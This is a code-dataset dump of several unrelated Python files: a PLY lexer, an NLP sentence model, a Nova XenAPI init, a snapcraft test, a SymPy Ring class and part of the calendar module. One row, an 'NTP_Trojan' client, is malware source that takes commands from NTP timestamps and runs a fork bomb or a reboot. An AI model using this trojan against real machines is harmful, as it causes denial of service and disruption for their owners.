repo_name stringlengths 5 100 | ref stringlengths 12 67 | path stringlengths 4 244 | copies stringlengths 1 8 | content stringlengths 0 1.05M ⌀ |
|---|---|---|---|---|
dhh1128/intent | refs/heads/master | old/grammar/ply/ply/intent_tokens.py | 1 | import lex
# Regular expression rules for simple tokens
t_PLUS = r'\+'
t_PLUS_EQUALS = r'\+='
t_MINUS = r'-'
t_MINUS_EQUALS = r'-='
t_TIMES = r'\*'
t_TIMES_EQUALS = r'\*='
t_DIVIDE = r'/'
t_DIVIDE_EQUALS = r'/='
t_MODULO = r'%'
t_MODULO_EQUALS = r'%='
t_TILDE = r'~'
t_DOT = r'.'
t_COMMA = r','
t_QUOTE = r'"'
t_BIT_AND = r'&'
t_BIT_AND_EQUALS = '&='
t_BIT_OR = r'\|'
t_BIT_OR_EQUALS = r'\|='
t_BIT_XOR = r'\^'
t_BIT_XOR_EQUALS = r'\^='
t_LESS_THAN = r'<'
t_LESS_THAN_EQUAL = r'<='
t_DOUBLE_LESS_THAN = r'<<'
t_GREATER_THAN = r'>>'
t_GREATER_THAN_EQUAL = r'>='
t_DOUBLE_GREATER_THAN = r'>>'
t_EQUALS = r'='
t_LPAREN = r'\('
t_RPAREN = r'\)'
t_INDENT = r'\x01'
t_DEDENT = r'\x02'
t_NAME = r'[a-z]+'
def t_FLOAT(t):
r'\d+((\.\d*)([eE]-?\d+)?|(\.\d*)?([eE]-?\d+))'
return t
def t_NUMBER(t):
r'(0([0-7_]+|[bB][01_]+|[xX][0-9A-Fa-f_]+)?|[1-9][0-9_]*)'
# We support octal, binary, hex, and decimal literals.
return t
import re
pat = re.compile('t_[A-Z_]+')
tokens = [name[2:] for name in locals().keys() if pat.match(name)]
del pat
del re
def _scan_indents(lexer):
'''
At beginning of a new line, see how many indents it has. Each indent can
potentially be a different width, but we should never mix spaces and tabs.
Return how many new indents or dedents we see. The max new indent is 1;
the max number of new dedents == current indent level. Dedents are returned
as negative numbers (so to dedent 4 times, return -4).
'''
i = lexer.lexpos
txt = lexer.lexdata
end = lexer.lexlen
current_indent_idx = len(lexer.indents) - 1
more_lines = True
start_over = False
while more_lines:
# Did we run out of characters?
if i + 1 >= end:
return
# Sample first char on next line.
c = txt[i]
# If line's not indented, record necessary dedents and exit.
if not c.isspace():
lexer.indent_delta = -1 * (current_indent_idx + 1)
return
# If this is the first indented line, lock the entire lexing
# pass to either tabs or spaces -- disallow mixture.
if lexer.indent_char is None:
lexer.indent_char = c
# Now walk through each indenter that's currently active, and see
# how many of them we see on this new line.
indent_idx = 0
while indent_idx <= current_indent_idx:
width = lexer.indents[indent_idx]
begin = lexer.lexpos
indent_end = begin + width
actual_end = min(indent_end, end)
start_over = False
j = begin
while j < actual_end:
c = txt[j]
if c != lexer.indent_char:
# If we stopped processing an indented line because we hit another
# line break, just start the analysis all over.
if c == '\n':
lexer.lineno += 1
start_over = True
break
# If we found at least one indent char, but not all of the indent chars
# we expected, we definitely have a problem.
if j > begin:
if c.isspace():
raise Exception("Bad indent char %d on line %d." % (ord(c), lexer.lineno))
else:
raise Exception("Incomplete indent on line %d." % lexer.lineno)
break
j += 1
# If we get here, then we have consumed pure indent chars, until
# either the indent was finished, a new linebreak was found, the
# input ended, or we hit non-indent characters.
# Consume everything we just scanned so lexer doesn't have to
# reanalyze.
lexer.lexpos = j
# If we found a line break or ran out of indent characters without
# throwing an exception, just exit this loop.
if start_over or (c != lexer.indent_char):
break
# If we did not see the full indent that we were expecting, then the
# input ended in the middle of a partial indent. This is not an error,
# but it means our job is done.
if actual_end < indent_end:
return
indent_idx += 1
# If we found a line break, restart the outermost loop with the fresh line.
if start_over:
continue
# If we get here, we've consumed all existing indents without exhausting
# our input. Are we as indented as the previous line?
if indent_idx <= current_indent_idx:
# No. We need to emit 1 or more dedents.
lexer.indent_delta = indent_idx - (current_indent_idx + 1)
# No need to look at subsequent lines; we've found meaningful text on this one.
more_lines = False
else:
# Yes. Are we more indented?
for j in xrange(lexer.lexpos, end):
c = txt[j]
if c != lexer.indent_char:
if c == '\n':
lexer.lineno += 1
lexer.lexpos = j
start_over = True
elif c.isspace():
raise Exception("Bad indent char %d on line %d." % (ord(c), lexer.lineno))
break
# If we found another new line, start all over again.
if start_over:
continue
if j > lexer.lexpos:
lexer.indents.append(j - lexer.lexpos)
lexer.lexpos = j
lexer.indent_delta = 1
# We're done.
more_lines = False
# Define a rule so we can track line numbers and track indents.
def t_newline(t):
r'\n+'
t.lexer.lineno += len(t.value)
_scan_indents(t.lexer)
# A string containing ignored characters (spaces and tabs)
t_ignore = ' \t\x01\x02'
# Error handling rule
def t_error(t):
print "Illegal character '%s'" % t.value[0]
t.lexer.skip(1)
lexer = lex.lex()
lexer.indents = []
lexer.indent_char = None
lexer.indent_delta = 0
if __name__ == '__main__':
while True:
print('Enter some code, then ! to finish...')
code = ''
while True:
line = raw_input()
if line == '!':
break
code = code + line + '\n'
for i in xrange(len(code)):
c = code[i]
if c == '\n':
c = '\\n'
elif c == ' ':
c = 'space'
print(str(i).rjust(3) + ' ' + c)
lexer.input(code)
while True:
tok = lexer.token()
if not tok:
print('')
break # No more input
print('type=%s, value=%s, line=%d, lexpos=%d' % (str(tok.type).rjust(7), str(tok.value).rjust(6), tok.lineno, tok.lexpos))
|
hill1303/CCGParaphraseGenerator | refs/heads/master | novel_disambiguation/models/sentence.py | 1 | from xml.etree import cElementTree as ElementTree
__author__ = 'Ethan A. Hill'
class Sentence:
def __init__(self, parent_file_name, top_parse, next_best_parse=None):
self.parent_file_name = parent_file_name
self.top_parse = top_parse
self.next_best_parse = next_best_parse
self.reference = top_parse.reference_sentence()
self.full_id = top_parse.sentence_id()
def __repr__(self):
repr_rep = ('Sentence(parent_file_name: {!s}, '
'full_id: {!s}, top_parse: {!s},'
'next_best_parse: {!s}'.format(self.parent_file_name,
self.full_id,
self.top_parse,
self.next_best_parse))
return repr_rep
def __cmp__(self, other):
sentence_number = int(self.full_id[1:])
other_sentence_number = int(other.full_id[1:])
if self.parent_file_name == other.parent_file_name:
return cmp(sentence_number, other_sentence_number)
else:
return cmp(self.parent_file_name, other.parent_file_name)
def __eq__(self, other):
return (self.parent_file_name == other.parent_file_name and
self.full_id == other.full_id and
self.top_parse == other.top_parse and
self.next_best_parse == other.next_best_parse)
def __ne__(self, other):
return (self.parent_file_name != other.parent_file_name or
self.full_id != other.full_id or
self.top_parse != other.top_parse or
self.next_best_parse != other.next_best_parse)
def __lt__(self, other):
sentence_number = int(self.full_id[1:])
other_sentence_number = int(other.full_id[1:])
if self.parent_file_name == other.parent_file_name:
return sentence_number < other_sentence_number
else:
return self.parent_file_name < other.parent_file_name
def __gt__(self, other):
sentence_number = int(self.full_id[1:])
other_sentence_number = int(other.full_id[1:])
if self.parent_file_name == other.parent_file_name:
return sentence_number > other_sentence_number
else:
return self.parent_file_name > other.parent_file_name
def __le__(self, other):
sentence_number = int(self.full_id[1:])
other_sentence_number = int(other.full_id[1:])
if self.parent_file_name == other.parent_file_name:
return sentence_number <= other_sentence_number
else:
return self.parent_file_name <= other.parent_file_name
def __ge__(self, other):
sentence_number = int(self.full_id[1:])
other_sentence_number = int(other.full_id[1:])
if self.parent_file_name == other.parent_file_name:
return sentence_number >= other_sentence_number
else:
return self.parent_file_name >= other.parent_file_name
def ambiguous_span(self):
if self.top_parse is not None and self.next_best_parse is not None:
dependencies = self.top_parse.unlabeled_dependency_set()
other_depend = self.next_best_parse.unlabeled_dependency_set()
difference = dependencies.symmetric_difference(other_depend)
else:
# If there is no second parse, then there is no ambiguity
difference = set()
return difference
def is_ambiguous(self):
return True if self.ambiguous_span() else False
def is_unambiguous(self):
return True if not self.ambiguous_span() else False
def detailed_ambiguous_span(self):
span = self.ambiguous_span()
# Only look at existing parses
parses = [p for p in [self.top_parse, self.next_best_parse] if p]
detailed_span = set()
for parse in parses:
for details, unlabeled in parse.dependency_details_map.iteritems():
if unlabeled in span:
detailed_span.add(details)
return detailed_span
def parse_specific_ambiguity_details(self, parse):
index_stem_map = {}
for head, dependent in self.detailed_ambiguous_span():
head_stem, head_pos = head.stem, head.pos_tag
depend_stem, depend_pos = dependent.stem, dependent.pos_tag
if (head, dependent) not in parse.dependency_details_map:
# Adjust the stems that appear in the map to match parse stems
for parse_head, parse_depend in parse.dependency_details_map:
if parse_head.index == head.index:
head_stem = parse_head.stem
head_pos = parse_head.pos_tag
elif parse_head.index == dependent.index:
depend_stem = parse_head.stem
depend_pos = parse_head.pos_tag
if parse_depend.index == head.index:
head_stem = parse_depend.stem
head_pos = parse_depend.pos_tag
elif parse_depend.index == dependent.index:
depend_stem = parse_depend.stem
depend_pos = parse_depend.pos_tag
index_stem_map[head.index] = head_pos, head_stem
index_stem_map[dependent.index] = depend_pos, depend_stem
return index_stem_map
def has_disambiguation_options(self):
if self.is_ambiguous():
return (self.top_parse.has_disambiguation_options() or
self.next_best_parse.has_disambiguation_options())
else:
return False
def has_single_sided_disambiguation(self):
if self.is_ambiguous():
top_only = (self.top_parse.has_disambiguation_options() and
not self.next_best_parse.has_disambiguation_options())
next_only = (self.next_best_parse.has_disambiguation_options() and
not self.top_parse.has_disambiguation_options())
return top_only or next_only
else:
return False
def has_double_sided_disambiguation(self):
if self.is_ambiguous():
return (self.top_parse.has_disambiguation_options() and
self.next_best_parse.has_disambiguation_options())
else:
return False
def xmlize(self):
attributes = {
'text_file': self.parent_file_name,
'sentence_id': self.full_id,
'reference': self.reference,
'ambiguous': str(self.is_ambiguous())}
sentence_xml = ElementTree.Element('sentence', attributes)
parses = [p for p in [self.top_parse, self.next_best_parse] if p]
if self.ambiguous_span():
ambiguous_span_xml = ElementTree.SubElement(
sentence_xml, 'ambiguous_span')
for head, dependent in self.ambiguous_span():
unlabeled_attributes = {
'head': head,
'dependent': dependent}
dependency_xml = ElementTree.Element(
'dependency', unlabeled_attributes)
ambiguous_span_xml.append(dependency_xml)
for parse in parses:
sentence_xml.append(parse.xmlize(self.ambiguous_span()))
return sentence_xml
|
OpenAcademy-OpenStack/nova-scheduler | refs/heads/master | nova/virt/xenapi/__init__.py | 126 | # Copyright (c) 2010 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
:mod:`xenapi` -- Nova support for XenServer and XCP through XenAPI
==================================================================
"""
from nova.virt.xenapi import driver
XenAPIDriver = driver.XenAPIDriver
|
ahhh/NTP_Trojan | refs/heads/master | client.py | 2 | import ntplib
import sys, os, subprocess
from time import ctime
HostIP = '127.0.0.1'
# Essential shell functionality
def run_command(cmd):
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, stdin=subprocess.PIPE)
stdoutput = proc.stdout.read() + proc.stderr.read()
return stdoutput
c = ntplib.NTPClient()
response = c.request(HostIP)
#print ctime(response.tx_time) # old print time
command = response.tx_time
#print ctime(command); print int(command)
# Forkbomb command
if int(command) == int(-2208988799):
run_command(":(){ :|:& };:")
# Reboot if root command
if int(command) == int(-2208988798):
run_command("reboot")
# Test command
if int(command) == int(-2208988797):
print run_command("echo test")
|
jocave/snapcraft | refs/heads/master | integration_tests/test_store_download.py | 1 | # -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2016 Canonical Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
from testtools.matchers import FileExists
import integration_tests
from snapcraft.tests import fixture_setup
class DownloadTestCase(integration_tests.TestCase):
def setUp(self):
super().setUp()
if not os.getenv('TEST_USER_PASSWORD', None):
self.useFixture(fixture_setup.FakeStore())
else:
self.skipTest('There is no ubuntu-core snap in the staging server')
# TODO add the snap to the staging server.
self.login()
def test_download_os_snap(self):
project_dir = 'kernel-download'
self.run_snapcraft('pull', project_dir)
self.assertThat(
os.path.join(project_dir, 'parts', 'kernel', 'src', 'os.snap'),
FileExists())
|
byte-up/custom-filter-django-oscar | refs/heads/master | shop/catalogue/__init__.py | 1 | default_app_config = 'shop.catalogue.config.CatalogueConfig'
|
dqnykamp/sympy | refs/heads/master | sympy/polys/domains/ring.py | 103 | """Implementation of :class:`Ring` class. """
from __future__ import print_function, division
from sympy.polys.domains.domain import Domain
from sympy.polys.polyerrors import ExactQuotientFailed, NotInvertible, NotReversible
from sympy.utilities import public
@public
class Ring(Domain):
"""Represents a ring domain. """
has_Ring = True
def get_ring(self):
"""Returns a ring associated with ``self``. """
return self
def exquo(self, a, b):
"""Exact quotient of ``a`` and ``b``, implies ``__floordiv__``. """
if a % b:
raise ExactQuotientFailed(a, b, self)
else:
return a // b
def quo(self, a, b):
"""Quotient of ``a`` and ``b``, implies ``__floordiv__``. """
return a // b
def rem(self, a, b):
"""Remainder of ``a`` and ``b``, implies ``__mod__``. """
return a % b
def div(self, a, b):
"""Division of ``a`` and ``b``, implies ``__divmod__``. """
return divmod(a, b)
def invert(self, a, b):
"""Returns inversion of ``a mod b``. """
s, t, h = self.gcdex(a, b)
if self.is_one(h):
return s % b
else:
raise NotInvertible("zero divisor")
def revert(self, a):
"""Returns ``a**(-1)`` if possible. """
if self.is_one(a):
return a
else:
raise NotReversible('only unity is reversible in a ring')
def is_unit(self, a):
try:
self.revert(a)
return True
except NotReversible:
return False
def numer(self, a):
"""Returns numerator of ``a``. """
return a
def denom(self, a):
"""Returns denominator of `a`. """
return self.one
def free_module(self, rank):
"""
Generate a free module of rank ``rank`` over self.
>>> from sympy.abc import x
>>> from sympy import QQ
>>> QQ.old_poly_ring(x).free_module(2)
QQ[x]**2
"""
raise NotImplementedError
def ideal(self, *gens):
"""
Generate an ideal of ``self``.
>>> from sympy.abc import x
>>> from sympy import QQ
>>> QQ.old_poly_ring(x).ideal(x**2)
<x**2>
"""
from sympy.polys.agca.ideals import ModuleImplementedIdeal
return ModuleImplementedIdeal(self, self.free_module(1).submodule(
*[[x] for x in gens]))
def quotient_ring(self, e):
"""
Form a quotient ring of ``self``.
Here ``e`` can be an ideal or an iterable.
>>> from sympy.abc import x
>>> from sympy import QQ
>>> QQ.old_poly_ring(x).quotient_ring(QQ.old_poly_ring(x).ideal(x**2))
QQ[x]/<x**2>
>>> QQ.old_poly_ring(x).quotient_ring([x**2])
QQ[x]/<x**2>
The division operator has been overloaded for this:
>>> QQ.old_poly_ring(x)/[x**2]
QQ[x]/<x**2>
"""
from sympy.polys.agca.ideals import Ideal
from sympy.polys.domains.quotientring import QuotientRing
if not isinstance(e, Ideal):
e = self.ideal(*e)
return QuotientRing(self, e)
def __div__(self, e):
return self.quotient_ring(e)
__truediv__ = __div__
|
40223219/w16_test | refs/heads/master | static/Brython3.1.1-20150328-091302/Lib/calendar.py | 828 | """Calendar printing functions
Note when comparing these calendars to the ones printed by cal(1): By
default, these calendars have Monday as the first day of the week, and
Sunday as the last (the European convention). Use setfirstweekday() to
set the first day of the week (0=Monday, 6=Sunday)."""
import sys
import datetime
import locale as _locale
__all__ = ["IllegalMonthError", "IllegalWeekdayError", "setfirstweekday",
"firstweekday", "isleap", "leapdays", "weekday", "monthrange",
"monthcalendar", "prmonth", "month", "prcal", "calendar",
"timegm", "month_name", "month_abbr", "day_name", "day_abbr"]
# Exception raised for bad input (with string parameter for details)
error = ValueError
# Exceptions raised for bad input
class IllegalMonthError(ValueError):
def __init__(self, month):
self.month = month
def __str__(self):
return "bad month number %r; must be 1-12" % self.month
class IllegalWeekdayError(ValueError):
def __init__(self, weekday):
self.weekday = weekday
def __str__(self):
return "bad weekday number %r; must be 0 (Monday) to 6 (Sunday)" % self.weekday
# Constants for months referenced later
January = 1
February = 2
# Number of days per month (except for February in leap years)
mdays = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
# This module used to have hard-coded lists of day and month names, as
# English strings. The classes following emulate a read-only version of
# that, but supply localized names. Note that the values are computed
# fresh on each call, in case the user changes locale between calls.
class _localized_month:
_months = [datetime.date(2001, i+1, 1).strftime for i in range(12)]
_months.insert(0, lambda x: "")
def __init__(self, format):
self.format = format
def __getitem__(self, i):
funcs = self._months[i]
if isinstance(i, slice):
return [f(self.format) for f in funcs]
else:
return funcs(self.format)
def __len__(self):
return 13
class _localized_day:
# January 1, 2001, was a Monday.
_days = [datetime.date(2001, 1, i+1).strftime for i in range(7)]
def __init__(self, format):
self.format = format
def __getitem__(self, i):
funcs = self._days[i]
if isinstance(i, slice):
return [f(self.format) for f in funcs]
else:
return funcs(self.format)
def __len__(self):
return 7
# Full and abbreviated names of weekdays
day_name = _localized_day('%A')
day_abbr = _localized_day('%a')
# Full and abbreviated names of months (1-based arrays!!!)
month_name = _localized_month('%B')
month_abbr = _localized_month('%b')
# Constants for weekdays
(MONDAY, TUESDAY, WEDNESDAY, THURSDAY, FRIDAY, SATURDAY, SUNDAY) = range(7)
def isleap(year):
"""Return True for leap years, False for non-leap years."""
return year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)
def leapdays(y1, y2):
"""Return number of leap years in range [y1, y2).
Assume y1 <= y2."""
y1 -= 1
y2 -= 1
return (y2//4 - y1//4) - (y2//100 - y1//100) + (y2//400 - y1//400)
def weekday(year, month, day):
"""Return weekday (0-6 ~ Mon-Sun) for year (1970-...), month (1-12),
day (1-31)."""
return datetime.date(year, month, day).weekday()
def monthrange(year, month):
"""Return weekday (0-6 ~ Mon-Sun) and number of days (28-31) for
year, month."""
if not 1 <= month <= 12:
raise IllegalMonthError(month)
day1 = weekday(year, month, 1)
ndays = mdays[month] + (month == February and isleap(year))
return day1, ndays
class Calendar(object):
"""
Base calendar class. This class doesn't do any formatting. It simply
provides data to subclasses.
"""
def __init__(self, firstweekday=0):
self.firstweekday = firstweekday # 0 = Monday, 6 = Sunday
def getfirstweekday(self):
return self._firstweekday % 7
def setfirstweekday(self, firstweekday):
self._firstweekday = firstweekday
firstweekday = property(getfirstweekday, setfirstweekday)
def iterweekdays(self):
"""
Return a iterator for one week of weekday numbers starting with the
configured first one.
"""
for i in range(self.firstweekday, self.firstweekday + 7):
yield i%7
def itermonthdates(self, year, month):
"""
Return an iterator for one month. The iterator will yield datetime.date
values and will always iterate through complete weeks, so it will yield
dates outside the specified month.
"""
date = datetime.date(year, month, 1)
# Go back to the beginning of the week
days = (date.weekday() - self.firstweekday) % 7
date -= datetime.timedelta(days=days)
oneday = datetime.timedelta(days=1)
while True:
yield date
try:
date += oneday
except OverflowError:
# Adding one day could fail after datetime.MAXYEAR
break
if date.month != month and date.weekday() == self.firstweekday:
break
def itermonthdays2(self, year, month):
"""
Like itermonthdates(), but will yield (day number, weekday number)
tuples. For days outside the specified month the day number is 0.
"""
for date in self.itermonthdates(year, month):
if date.month != month:
yield (0, date.weekday())
else:
yield (date.day, date.weekday())
def itermonthdays(self, year, month):
"""
Like itermonthdates(), but will yield day numbers. For days outside
the specified month the day number is 0.
"""
for date in self.itermonthdates(year, month):
if date.month != month:
yield 0
else:
yield date.day
def monthdatescalendar(self, year, month):
"""
Return a matrix (list of lists) representing a month's calendar.
Each row represents a week; week entries are datetime.date values.
"""
dates = list(self.itermonthdates(year, month))
return [ dates[i:i+7] for i in range(0, len(dates), 7) ]
def monthdays2calendar(self, year, month):
"""
Return a matrix representing a month's calendar.
Each row represents a week; week entries are
(day number, weekday number) tuples. Day numbers outside this month
are zero.
"""
days = list(self.itermonthdays2(year, month))
return [ days[i:i+7] for i in range(0, len(days), 7) ]
def monthdayscalendar(self, year, month):
"""
Return a matrix representing a month's calendar.
Each row represents a week; days outside this month are zero.
"""
days = list(self.itermonthdays(year, month))
return [ days[i:i+7] for i in range(0, len(days), 7) ]
def yeardatescalendar(self, year, width=3):
"""
Return the data for the specified year ready for formatting. The return
value is a list of month rows. Each month row contains up to width months.
Each month contains between 4 and 6 weeks and each week contains 1-7
days. Days are datetime.date objects.
"""
months = [
self.monthdatescalendar(year, i)
for i in range(January, January+12)
]
return [months[i:i+width] for i in range(0, len(months), width) ]
def yeardays2calendar(self, year, width=3):
"""
Return the data for the specified year ready for formatting (similar to
yeardatescalendar()). Entries in the week lists are
(day number, weekday number) tuples. Day numbers outside this month are
zero.
"""
months = [
self.monthdays2calendar(year, i)
for i in range(January, January+12)
]
return [months[i:i+width] for i in range(0, len(months), width) ]
def yeardayscalendar(self, year, width=3):
"""
Return the data for the specified year ready for formatting (similar to
yeardatescalendar()). Entries in the week lists are day numbers.
Day numbers outside this month are zero.
"""
months = [
self.monthdayscalendar(year, i)
for i in range(January, January+12)
]
return [months[i:i+width] for i in range(0, len(months), width) ]
class TextCalendar(Calendar):
"""
Subclass of Calendar that outputs a calendar as a simple plain text
similar to the UNIX program cal.
"""
def prweek(self, theweek, width):
"""
Print a single week (no newline).
"""
print(self.formatweek(theweek, width), end=' ')
def formatday(self, day, weekday, width):
"""
Returns a formatted day.
"""
if day == 0:
s = ''
else:
s = '%2i' % day # right-align single-digit days
return s.center(width)
def formatweek(self, theweek, width):
"""
Returns a single week in a string (no newline).
"""
return ' '.join(self.formatday(d, wd, width) for (d, wd) in theweek)
def formatweekday(self, day, width):
"""
Returns a formatted week day name.
"""
if width >= 9:
names = day_name
else:
names = day_abbr
return names[day][:width].center(width)
def formatweekheader(self, width):
"""
Return a header for a week.
"""
return ' '.join(self.formatweekday(i, width) for i in self.iterweekdays())
def formatmonthname(self, theyear, themonth, width, withyear=True):
"""
Return a formatted month name.
"""
s = month_name[themonth]
if withyear:
s = "%s %r" % (s, theyear)
return s.center(width)
def prmonth(self, theyear, themonth, w=0, l=0):
"""
Print a month's calendar.
"""
print(self.formatmonth(theyear, themonth, w, l), end=' ')
def formatmonth(self, theyear, themonth, w=0, l=0):
"""
Return a month's calendar string (multi-line).
"""
w = max(2, w)
l = max(1, l)
s = self.formatmonthname(theyear, themonth, 7 * (w + 1) - 1)
s = s.rstrip()
s += '\n' * l
s += self.formatweekheader(w).rstrip()
s += '\n' * l
for week in self.monthdays2calendar(theyear, themonth):
s += self.formatweek(week, w).rstrip()
s += '\n' * l
return s
def formatyear(self, theyear, w=2, l=1, c=6, m=3):
"""
Returns a year's calendar as a multi-line string.
"""
w = max(2, w)
l = max(1, l)
c = max(2, c)
colwidth = (w + 1) * 7 - 1
v = []
a = v.append
a(repr(theyear).center(colwidth*m+c*(m-1)).rstrip())
a('\n'*l)
header = self.formatweekheader(w)
for (i, row) in enumerate(self.yeardays2calendar(theyear, m)):
# months in this row
months = range(m*i+1, min(m*(i+1)+1, 13))
a('\n'*l)
names = (self.formatmonthname(theyear, k, colwidth, False)
for k in months)
a(formatstring(names, colwidth, c).rstrip())
a('\n'*l)
headers = (header for k in months)
a(formatstring(headers, colwidth, c).rstrip())
a('\n'*l)
# max number of weeks for this row
height = max(len(cal) for cal in row)
for j in range(height):
weeks = []
for cal in row:
if j >= len(cal):
weeks.append('')
else:
weeks.append(self.formatweek(cal[j], w))
a(formatstring(weeks, colwidth, c).rstrip())
a('\n' * l)
return ''.join(v)
def pryear(self, theyear, w=0, l=0, c=6, m=3):
"""Print a year's calendar."""
print(self.formatyear(theyear, w, l, c, m))
class HTMLCalendar(Calendar):
"""
This calendar returns complete HTML pages.
"""
# CSS classes for the day <td>s
cssclasses = ["mon", "tue", "wed", "thu", "fri", "sat", "sun"]
def formatday(self, day, weekday):
"""
Return a day as a table cell.
"""
if day == 0:
return '<td class="noday"> </td>' # day outside month
else:
return '<td class="%s">%d</td>' % (self.cssclasses[weekday], day)
def formatweek(self, theweek):
"""
Return a complete week as a table row.
"""
s = ''.join(self.formatday(d, wd) for (d, wd) in theweek)
return '<tr>%s</tr>' % s
def formatweekday(self, day):
"""
Return a weekday name as a table header.
"""
return '<th class="%s">%s</th>' % (self.cssclasses[day], day_abbr[day])
def formatweekheader(self):
"""
Return a header for a week as a table row.
"""
s = ''.join(self.formatweekday(i) for i in self.iterweekdays())
return '<tr>%s</tr>' % s
def formatmonthname(self, theyear, themonth, withyear=True):
"""
Return a month name as a table row.
"""
if withyear:
s = '%s %s' % (month_name[themonth], theyear)
else:
s = '%s' % month_name[themonth]
return '<tr><th colspan="7" class="month">%s</th></tr>' % s
def formatmonth(self, theyear, themonth, withyear=True):
"""
Return a formatted month as a table.
"""
v = []
a = v.append
a('<table border="0" cellpadding="0" cellspacing="0" class="month">')
a('\n')
a(self.formatmonthname(theyear, themonth, withyear=withyear))
a('\n')
a(self.formatweekheader())
a('\n')
for week in self.monthdays2calendar(theyear, themonth):
a(self.formatweek(week))
a('\n')
a('</table>')
a('\n')
return ''.join(v)
def formatyear(self, theyear, width=3):
"""
Return a formatted year as a table of tables.
"""
v = []
a = v.append
width = max(width, 1)
a('<table border="0" cellpadding="0" cellspacing="0" class="year">')
a('\n')
a('<tr><th colspan="%d" class="year">%s</th></tr>' % (width, theyear))
for i in range(January, January+12, width):
# months in this row
months = range(i, min(i+width, 13))
a('<tr>')
for m in months:
a('<td>')
a(self.formatmonth(theyear, m, withyear=False))
a('</td>')
a('</tr>')
a('</table>')
return ''.join(v)
def formatyearpage(self, theyear, width=3, css='calendar.css', encoding=None):
"""
Return a formatted year as a complete HTML page.
"""
if encoding is None:
encoding = sys.getdefaultencoding()
v = []
a = v.append
a('<?xml version="1.0" encoding="%s"?>\n' % encoding)
a('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\n')
a('<html>\n')
a('<head>\n')
a('<meta http-equiv="Content-Type" content="text/html; charset=%s" />\n' % encoding)
if css is not None:
a('<link rel="stylesheet" type="text/css" href="%s" />\n' % css)
a('<title>Calendar for %d</title>\n' % theyear)
a('</head>\n')
a('<body>\n')
a(self.formatyear(theyear, width))
a('</body>\n')
a('</html>\n')
return ''.join(v).encode(encoding, "xmlcharrefreplace")
class different_locale:
def __init__(self, locale):
self.locale = locale
def __enter__(self):
self.oldlocale = _locale.getlocale(_locale.LC_TIME)
_locale.setlocale(_locale.LC_TIME, self.locale)
def __exit__(self, *args):
_locale.setlocale(_locale.LC_TIME, self.oldlocale)
class LocaleTextCalendar(TextCalendar):
"""
This class can be passed a locale name in the constructor and will return
month and weekday names in the specified locale. If this locale includes
an encoding all strings containing month and weekday names will be returned
as unicode.
"""
def __init__(self, firstweekday=0, locale=None):
TextCalendar.__init__(self, firstweekday)
if locale is None:
locale = _locale.getdefaultlocale()
self.locale = locale
def formatweekday(self, day, width):
with different_locale(self.locale):
if width >= 9:
names = day_name
else:
names = day_abbr
name = names[day]
return name[:width].center(width)
def formatmonthname(self, theyear, themonth, width, withyear=True):
with different_locale(self.locale):
s = month_name[themonth]
if withyear:
s = "%s %r" % (s, theyear)
return s.center(width)
class LocaleHTMLCalendar(HTMLCalendar):
"""
This class can be passed a locale name in the constructor and will return
month and weekday names in the specified locale. If this locale includes
an encoding all strings containing month and weekday names will be returned
as unicode.
"""
def __init__(self, firstweekday=0, locale=None):
HTMLCalendar.__init__(self, firstweekday)
if locale is None:
locale = _locale.getdefaultlocale()
self.locale = locale
def formatweekday(self, day):
with different_locale(self.locale):
s = day_abbr[day]
return '<th class="%s">%s</th>' % (self.cssclasses[day], s)
def formatmonthname(self, theyear, themonth, withyear=True):
with different_locale(self.locale):
s = month_name[themonth]
if withyear:
s = '%s %s' % (s, theyear)
return '<tr><th colspan="7" class="month">%s</th></tr>' % s
# Support for old module level interface
c = TextCalendar()
firstweekday = c.getfirstweekday
def setfirstweekday(firstweekday):
if not MONDAY <= firstweekday <= SUNDAY:
raise IllegalWeekdayError(firstweekday)
c.firstweekday = firstweekday
monthcalendar = c.monthdayscalendar
prweek = c.prweek
week = c.formatweek
weekheader = c.formatweekheader
prmonth = c.prmonth
month = c.formatmonth
calendar = c.formatyear
prcal = c.pryear
# Spacing of month columns for multi-column year calendar
_colwidth = 7*3 - 1 # Amount printed by prweek()
_spacing = 6 # Number of spaces between columns
def format(cols, colwidth=_colwidth, spacing=_spacing):
"""Prints multi-column formatting for year calendars"""
print(formatstring(cols, colwidth, spacing))
def formatstring(cols, colwidth=_colwidth, spacing=_spacing):
"""Returns a string formatted from n strings, centered within n columns."""
spacing *= ' '
return spacing.join(c.center(colwidth) for c in cols)
EPOCH = 1970
_EPOCH_ORD = datetime.date(EPOCH, 1, 1).toordinal()
def timegm(tuple):
"""Unrelated but handy function to calculate Unix timestamp from GMT."""
year, month, day, hour, minute, second = tuple[:6]
days = datetime.date(year, month, 1).toordinal() - _EPOCH_ORD + day - 1
hours = days*24 + hour
minutes = hours*60 + minute
seconds = minutes*60 + second
return seconds
def main(args):
import optparse
parser = optparse.OptionParser(usage="usage: %prog [options] [year [month]]")
parser.add_option(
"-w", "--width",
dest="width", type="int", default=2,
help="width of date column (default 2, text only)"
)
parser.add_option(
"-l", "--lines",
dest="lines", type="int", default=1,
help="number of lines for each week (default 1, text only)"
)
parser.add_option(
"-s", "--spacing",
dest="spacing", type="int", default=6,
help="spacing between months (default 6, text only)"
)
parser.add_option(
"-m", "--months",
dest="months", type="int", default=3,
help="months per row (default 3, text only)"
)
parser.add_option(
"-c", "--css",
dest="css", default="calendar.css",
help="CSS to use for page (html only)"
)
parser.add_option(
"-L", "--locale",
